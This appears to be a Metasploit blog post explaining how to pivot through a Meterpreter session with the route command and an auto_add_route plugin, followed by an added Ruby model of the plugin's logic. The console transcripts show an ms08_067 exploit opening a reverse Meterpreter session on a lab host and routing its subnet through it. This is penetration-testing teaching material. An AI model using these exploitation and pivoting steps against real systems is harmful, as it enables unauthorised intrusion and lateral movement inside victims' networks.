Last updated at Wed, 27 Sep 2017 20:51:45 GMT
Among the coolest features in Metasploit is the ability to pivot through a Meterpreter session to the network on the other side of the compromised host. The route command in msfconsole sets this up, but it requires a bit of typing to get right.
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1238)
meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet      Netmask          Gateway
------      -------          -------
10.1.1.0    255.255.255.0    Session 1
msf exploit(ms08_067_netapi) >
After running the above commands, any traffic sent to addresses in the 10.1.1.0 network will be tunnelled through the session. As part of my Blackhat DC presentation last week, I demo'd a plugin that automatically adds a route for any previously-unseen subnets when a new session opens up. Here is some example usage and output:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.1.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1
meterpreter > background
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet      Netmask          Gateway
------      -------          -------
10.1.1.0    255.255.255.0    Session 1
msf exploit(ms08_067_netapi) >
The auto_add_route plugin is now available in the metasploit trunk; 'svn up' to get it.
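To make the plugin's "previously-unseen subnet" rule concrete, here is a small stand-alone Ruby model of it. This is an added example, not the auto_add_route plugin's own code and not Metasploit's API: it does not hook the framework's session events, it simply parses `get_local_subnets` output as shown above, keeps a routing table shaped like `route print`, and adds a route only when the exact subnet/netmask pair is not already present (the exact-match rule is an assumption; the real plugin's matching may differ). The `Route`, `RouteTable`, `parse_local_subnet` and `auto_add_routes` names are mine, and the session output strings are constructed from the transcript on this page.

```ruby
require 'ipaddr'

# One entry as msfconsole's "route print" shows it: subnet, netmask and
# the session id that acts as the gateway. (Hypothetical struct, not Metasploit's.)
Route = Struct.new(:subnet, :netmask, :session_id)

# Parse one line of get_local_subnets output, e.g. "Local subnet: 10.1.1.0/255.255.255.0".
# Returns [subnet, netmask] with host bits masked off, or nil if the line does not match
# or is not a valid IPv4 network.
def parse_local_subnet(line)
  m = line.match(%r{Local subnet:\s*(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,3}(?:\.\d{1,3}){3})})
  return nil unless m
  net = IPAddr.new("#{m[1]}/#{m[2]}") # IPAddr accepts a dotted netmask and validates the address
  [net.to_s, m[2]]
rescue IPAddr::Error
  nil
end

# Minimal model of msfconsole's routing table (assumption: exact subnet/netmask matching).
class RouteTable
  def initialize
    @routes = []
  end

  def routes
    @routes.dup
  end

  # True when this exact subnet/netmask pair already has a gateway session.
  def covered?(subnet, netmask)
    @routes.any? { |r| r.subnet == subnet && r.netmask == netmask }
  end

  # Add a route; returns false and changes nothing if the subnet is already routed,
  # so a second session on the same network does not silently replace the first gateway.
  def add(subnet, netmask, session_id)
    return false if covered?(subnet, netmask)
    @routes << Route.new(subnet, netmask, session_id)
    true
  end

  # Render in the same shape as "route print".
  def to_s
    header = ['Active Routing Table', '====================',
              format('%-12s %-16s %s', 'Subnet', 'Netmask', 'Gateway'),
              format('%-12s %-16s %s', '------', '-------', '-------')]
    rows = @routes.map { |r| format('%-12s %-16s Session %d', r.subnet, r.netmask, r.session_id) }
    (header + rows).join("\n")
  end
end

# What AutoAddRoute does when a session opens: for every subnet the new session
# reports, add a route only if it was not seen before. Returns the log lines that
# would be printed, one per newly added route.
def auto_add_routes(table, session_id, get_local_subnets_output)
  messages = []
  get_local_subnets_output.each_line do |line|
    parsed = parse_local_subnet(line)
    next unless parsed
    subnet, netmask = parsed
    next unless table.add(subnet, netmask, session_id)
    messages << "AutoAddRoute: Routing new subnet #{subnet}/#{netmask} through session #{session_id}"
  end
  messages
end

if __FILE__ == $0
  table = RouteTable.new
  # Constructed output, taken from the transcript above: session 1 sees 10.1.1.0/24.
  puts auto_add_routes(table, 1, "Local subnet: 10.1.1.0/255.255.255.0\n")
  # A later session on the same network adds nothing new; a different network does.
  puts auto_add_routes(table, 2, "Local subnet: 10.1.1.0/255.255.255.0\n" \
                                 "Local subnet: 192.168.50.0/255.255.255.0\n")
  puts table
end
```

Running the file prints the single AutoAddRoute line for session 1, then only the 192.168.50.0 line for session 2, and finally a two-row table in the `route print` layout; the 10.1.1.0 route stays pointed at session 1.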